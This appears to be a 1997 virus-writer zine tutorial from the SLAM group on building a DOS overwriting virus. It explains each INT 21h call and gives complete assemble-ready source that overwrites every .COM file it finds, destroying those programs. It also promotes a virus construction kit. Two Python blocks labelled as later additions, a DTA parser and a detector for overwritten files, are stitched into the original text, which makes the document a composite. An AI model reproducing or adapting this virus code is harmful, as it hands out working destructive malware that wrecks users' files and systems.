
SLAM2.037: OverWriting Virus Tutorial by Virtual Daemon [SLAM]

Published in Slam

" OverWriting Virii: The perfect choice for beginners "

by Virtual Daemon of SLAM Virus Team

Hi there! The reason I'm writing this little tutorial is that there are some dumb heads out there who don't know how to use my OVCT...

FUCK YOU LAMERS! I don't know why I'm wasting my time with you...

There are so many guys who don't know what a virus is... God! We must stop this... We give the public so many goodies (like stealth or polymorphic virii, or macro virii, etc.), and they don't know how to make an overwriting virus... That's pathetic! ;-( All they know is that they must take all the source we give them, modify it and put their stupid fucking names in our virii! And of course, we say that they'll just start by stealing and that they'll learn from it, but not even 2% of them actually do. The other 98% are just waiting for us to give them more sources, so they can modify them some more and spread them around saying that they made that virus... I'm sick of that! ;-(

I could write a whole book about lamers stealing others' virii (mine too), but this was supposed to be an overwriting tutorial, not a ... :)

Anyway, now that OVCT has been officially released in SLAM#2, I've gotta do this for those poor guys... maybe this way they'll learn something!

In this phile I'll try to explain the steps in creating an overwriting virus, and at the end of the file I'll give some source code examples...

Let's begin with the beginning!

Q: What is an overwriting virus?

R: An overwriting virus is a virus that, when reproducing, infects the victim by overwriting the first part of the program with itself.

ex. PROGRAM + VIRUS = VIRUSAM

Q: What do I need to make an overwriting virus?

R: In the first place you need to have a copy of a programming language.
Overwriting virii can be written in many languages such as Pascal, C, Asm, Basic etc., BUT the best language of all of these is Assembler. Of course there are many Assembler-style languages out there, but the best of all is Turbo Assembler from Borland, Inc. So, if you don't have a copy, GET ONE! Hey, when I said "get one", I meant "buy one", not "STEAL ONE"! ;)

In the 2nd place you need to know how to code in one of the languages listed above. Since this tutorial requires assembler skills, I suggest you learn assembler, because this is the best language for creating virii. If you don't know how to code in assembler I SUGGEST YOU GET OUT OF HERE AND START LEARNING ASSEMBLER! I'm not gonna teach you how to code in assembler...

Q: What is the structure of an overwriting virus?

R: Well, it's quite simple... First you need to find a file to infect, right? Ok. After the file is found you need to open it for reading and writing. Has the file been opened? Good, now you can do all that stuff like verifying whether it's already infected, or you can just simply write your virus to the file. After the virus has been written, you need to close the file and then return to the operating system (DOS).

Well, that's all! Simple, huh?

Ok. Now let's take it again, this time different:

  1. Find a file to infect
  2. Open the file
  3. Write your virus to file
  4. Close the file
  5. Exit

REMEMBER that this is the simplest structure of an overwriting virus, so for more stuff check out the sources generated by OVCT!!!

Q: What are the DOS functions which I can use in creating an overwriting virus?

R: As you've seen before, there are 5 steps in creating a simple overwriting virus. I'll take the steps again, this time with the related function...

1) Find a file to infect

- to find a file, you must use the 4Eh function (Find 1st Matching File)
Input:
AH = 4Eh
DS = SEGMENT ADDRESS OF ASCIIZ FILESPEC TO FIND
DX = OFFSET ADDRESS ---------- " " ----------
CX = FILE ATTRIBUTES

Returns:
AX = ERROR CODE IF CF IS SET TO CY
DTA FILLED WITH DATA IF NO ERROR (DTA = Disk Transfer Address)

Simple code:
mov ah,4eh ;find 1st file
mov cx,0 ;cx=0 => normal attributes
mov dx,offset file ;this will put in DS:DX the address of file
int 21h

file db '*.com',0 ;this means it will search for every file
;with the COM extension


As I said, after this code executes the DTA will be filled with data, but first let's see what the structure of this DTA is:

   Disk Transfer Address
*------------------------*

Offset | Size | Contents of DTA
-------+------+--------------------------------
0h     | 21   | reserved
15h    | 1    | file attributes
16h    | 2    | file creation time
18h    | 2    | file creation date
1ah    | 4    | file size
1eh    | 13   | 13 byte ASCIIZ of the file name


Note: the size is given in bytes, so in assembler a one byte value is declared with 'db', a 2 byte value with 'dw', a 4 byte value with 'dd'...

ex. file_attributes db ?
    file_time       dw ?
    file_size       dd ?


You also must understand that the DTA lies in the PSP (Program Segment Prefix), the first 100h bytes in front of COM files. Its address is 80h. For complex virii, you must move the DTA to another location so you won't have to fuck up the PSP. Anyway, since we're talking about overwriting virii, that's not important.

All we have to do after we've found a file is to take its name from the DTA, because the following function (open) will need the file name. As I said, the DTA is at 80h. The file name is at 1eh in the DTA, so all you have to do is add 1eh to 80h, and 'voilà!'

ex. file_name=80h+1eh=9eh
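The DTA layout above, worked through in code: this is an added example (mine, not from the tutorial or from OVCT) that decodes a FindFirst record the way a forensic tool or emulator would, unpacking the attribute bits and the packed DOS time and date words. The sample record is constructed; the 80h + 1eh = 9eh offset is the one computed above.

```python
import struct
from datetime import datetime

# FindFirst (INT 21h, AH=4Eh) fills the 43-byte DTA laid out in the table
# above: 21 reserved bytes, then attributes (15h), time (16h), date (18h),
# size (1Ah) and a 13-byte ASCIIZ name (1Eh). All words are little-endian.
DTA_SIZE = 0x2B
PSP_DTA = 0x80                  # default DTA lives at 80h in the PSP
NAME_OFFSET = PSP_DTA + 0x1E    # 9Eh, the offset the tutorial computes

ATTR_BITS = {0x01: "read-only", 0x02: "hidden", 0x04: "system",
             0x10: "directory", 0x20: "archive"}

def decode_dos_datetime(time_word: int, date_word: int) -> datetime:
    """DOS packs time as hhhhhmmmmmmsssss (seconds/2) and date as
    yyyyyyymmmmddddd with the year counted from 1980."""
    hour, minute = time_word >> 11, (time_word >> 5) & 0x3F
    second = (time_word & 0x1F) * 2
    year, month, day = 1980 + (date_word >> 9), (date_word >> 5) & 0x0F, date_word & 0x1F
    return datetime(year, month, day, hour, minute, second)

def parse_dta(dta: bytes) -> dict:
    """Decode one FindFirst/FindNext record into its fields."""
    if len(dta) < DTA_SIZE:
        raise ValueError(f"DTA needs {DTA_SIZE} bytes, got {len(dta)}")
    attr, t, d, size = struct.unpack_from("<BHHI", dta, 0x15)
    name = dta[0x1E:0x1E + 13].split(b"\x00", 1)[0].decode("ascii")
    return {"attributes": [n for bit, n in ATTR_BITS.items() if attr & bit],
            "timestamp": decode_dos_datetime(t, d), "size": size, "name": name}

def build_dta(name: str, size: int, attr: int, when: datetime) -> bytes:
    """Constructed sample record, packed the way DOS would fill the DTA."""
    t = (when.hour << 11) | (when.minute << 5) | (when.second // 2)
    d = ((when.year - 1980) << 9) | (when.month << 5) | when.day
    fields = struct.pack("<BHHI", attr, t, d, size)
    return b"\x00" * 0x15 + fields + name.encode("ascii").ljust(13, b"\x00")

# What FindFirst("*.com") might leave at 80h (constructed, not captured).
SAMPLE_DTA = build_dta("CMD.COM", 1234, 0x20, datetime(1997, 6, 15, 14, 30, 10))
SAMPLE = parse_dta(SAMPLE_DTA)
```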

2) OPEN THE FILE

- to open a file, you can use the 3Dh function (Open a File Handle)
Input:
AH = 3Dh
DS = SEGMENT ADDRESS OF ASCIIZ FILENAME (our file name)
DX = OFFSET ADDRESS ------------ " " ----------------
AL = OPEN MODE

-> 01h FOR READING
-> 02h FOR WRITING
-> 03h FOR READING & WRITING

Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE FILE HANDLE

Simple code:
;- the following 2 instructions can be replaced with "mov ax,3d02h"

mov ah,3dh ;open the file
mov al,02h ;for reading & writing
mov dx,9eh ;get file name from DTA
int 21h


Note: the file handle is now in AX, but if we have a look below at the other functions, we see that all of them need the file handle in BX, so we have to move it from AX into BX.

ex: xchg bx,ax ;this can be done also with "mov bx,ax"


3) WRITE THE VIRUS TO FILE

- in order to write something to a file, you must use the 40h function (Write to File via Handle) 

Input:
AH = 40h
BX = FILE HANDLE (this is why we changed the BX with the AX reg)
DX = OFFSET ADDRESS OF THE BEGINNING OF THE VIRUS
CX = NUMBER OF BYTES TO WRITE

Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE NUMBER OF BYTES ACTUALLY WRITTEN <- USE FOR ERROR TESTS

Simple code:
mov ah,40h ;write the virus
mov dx,offset virus_start ;buffer to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h


4) CLOSE THE FILE

- to close the file, you must use the 3eh function (Close a File via Handle)

Input:
AH = 3Eh
BX = FILE HANDLE

Returns:
AX = ERROR CODE IF CF IS SET TO CY

Simple code:
mov ah,3eh ;close the file
int 21h


5) Exit

- the simplest part 
Here you can use 2 methods:

a) int 20h
b) mov ah,4ch
int 21h


Both methods do the same thing: they terminate the program and return to the operating system. Since the first one is smaller, I suggest using that one.

Q: Now that I have all the information, how can I put it all together?

R: GOD! If you're still asking me this after everything I showed you, then you really suck! You're the biggest lamer! But... since I'm a good person I'll show you this too... ;-)

-------------------------------------------- cut here

; Virus Name: Lamer
; Virus Author: You
; To assemble use: tasm lamer.asm
; tlink /t lamer.obj
; (of course this expects that you'll cut & paste this code into a file
; called lamer.asm ;-)

code segment

assume cs:code,ds:code

org 100h ;for COM files

virus_start:

mov ah,4eh ;find first file
mov cx,cx ;cx=0 => normal files
mov dx,offset filespec ;ASCIIZ address of what to search for
int 21h

mov ax,3d02h ;I explained this to ya earlier ;)
mov dx,9eh ;get file name from DTA
int 21h

xchg bx,ax ;put file handle in bx

mov ah,40h ;write the virus to file
mov dx,offset virus_start ;buffer containing data to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h

mov ah,3eh ;close the file
int 21h

int 20h ;return to DOS

filespec db '*.com',0
virus_end:
code ends

end virus_start

-------------------------------------------- cut here


Well, that's it! You've just learned how to create your first virus (I hope! ;-) If you don't understand this then GET LOST! There's no place for you in this life...:)
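From the defender's side, an added example (mine, not part of the original tutorial or of OVCT): because PROGRAM + VIRUS = VIRUSAM leaves every victim starting with the same byte-identical body, infected .COM files in one directory share a long common prefix while their sizes stay unchanged. This Python clusters files by shared prefix and reports the shared bytes as the suspected body; the directory contents and the placeholder body bytes are constructed, and MIN_PREFIX is an assumed threshold.

```python
# An overwriting virus replaces the first len(virus) bytes of each victim with
# a byte-identical copy of itself and leaves the tail (and the size) alone, so
# infected .COM files share a long identical prefix while clean programs tend
# to diverge within their first few bytes. Nothing here can restore the
# destroyed program head; that only comes back from a backup.
MIN_PREFIX = 24   # bytes; assumed threshold, tune for the environment

def common_prefix_len(a: bytes, b: bytes) -> int:
    """Number of leading bytes on which a and b agree."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n

def cluster_by_prefix(files: dict, min_prefix: int = MIN_PREFIX) -> list:
    """Group files whose leading bytes agree for at least min_prefix bytes.
    Returns (shared_prefix, [names]) tuples, largest group first; the shared
    prefix of a group is the suspected virus body."""
    groups = []                                   # each entry: [prefix, names]
    for name, data in files.items():
        for grp in groups:
            n = common_prefix_len(grp[0], data)
            if n >= min_prefix:
                grp[0] = grp[0][:n]               # keep only what all members share
                grp[1].append(name)
                break
        else:
            groups.append([data, [name]])
    suspects = [(p, sorted(names)) for p, names in groups if len(names) > 1]
    return sorted(suspects, key=lambda s: -len(s[1]))

# --- constructed sample directory: placeholder bytes, not real machine code --
BODY = bytes((0x40 + i) % 251 for i in range(60))       # stand-in for a 60-byte body

def simulate_overwrite(original: bytes) -> bytes:
    """Model the infection the tutorial describes: head replaced, tail kept."""
    return BODY + original[len(BODY):]

DIR = {
    "EDIT.COM":  simulate_overwrite(b"\xE9\x10\x02" + b"\x90" * 300),
    "MORE.COM":  simulate_overwrite(b"\xB8\x00\x4C" + b"\xAA" * 150),
    "TREE.COM":  simulate_overwrite(b"\xCC" * 80),
    "CLEAN.COM": b"\xB4\x09\xBA" + b"\x11" * 50,
    "OTHER.COM": b"\xEB\x05\x90" + b"\x22" * 50,
}
SUSPECTS = cluster_by_prefix(DIR)   # one group: the three overwritten files
```

The heuristic only says which files agree; confirming an infection means comparing the shared prefix against a known sample, and the overwritten files have to be restored from backup rather than disinfected.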


About OVCT (Overwriting Virus Construction Toolkit):
I made that shit not because I don't know how to do anything else... I made it for you! Yes, for you, "dear friend", so you can learn how to create some virii. When you think you're smart enough to create & understand non-overwriting virii or TSR virii, then you can use my VCT (Virus Construction Toolkit), which will generate non-overwriting runtime or TSR virii. Of course the generated virii will be stealth, encrypted, anti-debugger, polymorphic, etc. I think the 1st version of VCT will be released during this summer (the summer of 1997). For more info about all this check the OVCT.DOC from the OVCT distribution kit, or read the SLAM Magazine...

Did you get all that? Anyway, I don't wanna see lamers "playing" with my kit and releasing virii or spreading them to other computers!!! (I think this is one of the many reasons why I didn't include bombs in OVCT :). If I see a virus created with OVCT in the field, or if I hear reports from people who got their computers infected with virii created with OVCT, YOU CAN SAY GOODBYE TO YOUR LIFE, LAMER, BECAUSE I'M COMING TO GET YA'!!! Btw: I'm not only a virus writer, I'm a GOD DAMN GOOD HACKER TOO!!! So, you'll hear from me... ;-)

Game over... Uh, uh .. I mean, I think this is the end of this shit...

P.S. If any of this information helped anyone in any way (not negative) in creating a virus, please let me know by sending me an e-mail. And, if you're really honest with me, you'll get a special prize like the source to my latest virus :) :) :)! And believe me, you'll want it!

Greetz:

  • to all the SLAM members
  • Dark Angel: you were the best!
  • Cicatrix: I love your VDAT!!! :)
  • and to everybody else who is related to the virus scene

Virtual Daemon
Viral Development Researcher & Virii Collector
Member of SLAM Virus Team
Network Administrator
E-mail: virtual_daemon@hotmail.com
